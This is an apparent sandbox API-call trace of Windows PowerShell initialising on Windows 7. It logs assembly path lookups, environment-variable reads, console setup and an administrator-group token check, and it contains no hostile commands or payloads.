	[0484.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ed300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0484.754] CoTaskMemAlloc (cb=0x104) returned 0x333120
	[0484.754] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x333120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0484.754] CoTaskMemFree (pv=0x333120) 
	[0484.757] CoTaskMemAlloc (cb=0x104) returned 0x333120
	[0484.757] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x333120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0484.757] CoTaskMemFree (pv=0x333120) 
	[0486.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0486.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0492.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ed300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0492.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ed300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0493.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0493.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0495.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1ed300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0495.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1ed300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0499.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ed300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0499.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ed300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0500.211] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0500.211] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0500.211] CoTaskMemFree (pv=0x1b6e48b0) 
	[0500.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0500.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0500.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0500.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1ed420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0500.921] SetErrorMode (uMode=0x1) returned 0x1
	[0500.921] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1ed6a0 | out: lpFileInformation=0x1ed6a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0500.921] SetErrorMode (uMode=0x1) returned 0x1
	[0503.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0503.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0503.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0503.020] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0503.020] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0503.020] CoTaskMemFree (pv=0x1b6e48b0) 
	[0503.023] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0503.023] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0503.023] CoTaskMemFree (pv=0x1b6e48b0) 
	[0503.023] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0503.023] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0503.023] CoTaskMemFree (pv=0x1b6e48b0) 
	[0503.026] CoCreateGuid (in: pguid=0x1eda68 | out: pguid=0x1eda68*(Data1=0x19886958, Data2=0xb7a8, Data3=0x46e0, Data4=([0]=0xb0, [1]=0x21, [2]=0x73, [3]=0x7e, [4]=0xc9, [5]=0x3e, [6]=0x4b, [7]=0x5e))) returned 0x0
	[0503.029] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0503.029] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0503.029] CoTaskMemFree (pv=0x1b6e48b0) 
	[0503.032] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0503.032] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0503.032] CoTaskMemFree (pv=0x1b6e48b0) 
	[0503.034] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0503.034] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0503.034] CoTaskMemFree (pv=0x1b6e48b0) 
	[0503.041] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0503.681] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x1ed710 | out: lpConsoleScreenBufferInfo=0x1ed710) returned 1
	[0503.688] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0503.689] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x1ed710 | out: lpConsoleScreenBufferInfo=0x1ed710) returned 1
	[0503.690] GetVersionExW (in: lpVersionInformation=0x1ed6a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ed6a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0503.693] GetCurrentProcess () returned 0xffffffffffffffff
	[0503.694] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1ed738 | out: TokenHandle=0x1ed738*=0x1c8) returned 1
	[0503.698] GetTokenInformation (in: TokenHandle=0x1c8, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1ed658 | out: TokenInformation=0x0, ReturnLength=0x1ed658) returned 0
	[0503.699] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x347290
	[0503.699] GetTokenInformation (in: TokenHandle=0x1c8, TokenInformationClass=0x8, TokenInformation=0x347290, TokenInformationLength=0x4, ReturnLength=0x1ed658 | out: TokenInformation=0x347290, ReturnLength=0x1ed658) returned 1
	[0503.699] DuplicateTokenEx (in: hExistingToken=0x1c8, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x1ed7b8 | out: phNewToken=0x1ed7b8*=0x1cc) returned 1
	[0503.699] GetTokenInformation (in: TokenHandle=0x1c8, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1ed658 | out: TokenInformation=0x0, ReturnLength=0x1ed658) returned 0
	[0503.700] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3472c0
	[0503.700] GetTokenInformation (in: TokenHandle=0x1c8, TokenInformationClass=0x8, TokenInformation=0x3472c0, TokenInformationLength=0x4, ReturnLength=0x1ed658 | out: TokenInformation=0x3472c0, ReturnLength=0x1ed658) returned 1
	[0503.700] CheckTokenMembership (in: TokenHandle=0x1cc, SidToCheck=0x2d60528*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x1ed7c8 | out: IsMember=0x1ed7c8) returned 1
	[0503.700] CloseHandle (hObject=0x1cc) returned 1
	[0503.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0503.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0503.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0503.720] CoTaskMemAlloc (cb=0x804) returned 0x1b6e6880
	[0503.720] GetConsoleTitleW (in: lpConsoleTitle=0x1b6e6880, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0504.382] CoTaskMemFree (pv=0x1b6e6880) 
	[0504.408] CoTaskMemAlloc (cb=0x804) returned 0x1b6e7130
	[0504.408] GetConsoleTitleW (in: lpConsoleTitle=0x1b6e7130, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0504.408] CoTaskMemFree (pv=0x1b6e7130) 
	[0504.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0504.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0504.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0504.411] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0506.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0506.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0506.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0506.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0506.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0506.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0506.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0506.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0506.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0506.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0506.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0506.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0506.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0506.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0507.695] SetConsoleCtrlHandler (HandlerRoutine=0x2b968dc, Add=1) returned 1
	[0507.711] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x318
	[0507.713] CoCreateGuid (in: pguid=0x1ed8b0 | out: pguid=0x1ed8b0*(Data1=0x998b8e13, Data2=0x66ea, Data3=0x40b4, Data4=([0]=0x86, [1]=0x3, [2]=0xc1, [3]=0xe5, [4]=0x71, [5]=0xbc, [6]=0x65, [7]=0x83))) returned 0x0
	[0507.715] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0507.715] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.715] CoTaskMemFree (pv=0x1b6e48b0) 
	[0508.269] WinSqmIsOptedIn () returned 0x0
	[0508.269] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0508.269] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0508.269] CoTaskMemFree (pv=0x1b6e48b0) 
	[0508.270] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0508.270] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0508.270] CoTaskMemFree (pv=0x1b6e48b0) 
	[0508.270] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0508.271] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0508.271] CoTaskMemFree (pv=0x1b6e48b0) 
	[0508.271] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0508.271] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0508.271] CoTaskMemFree (pv=0x1b6e48b0) 
	[0508.272] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0508.272] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
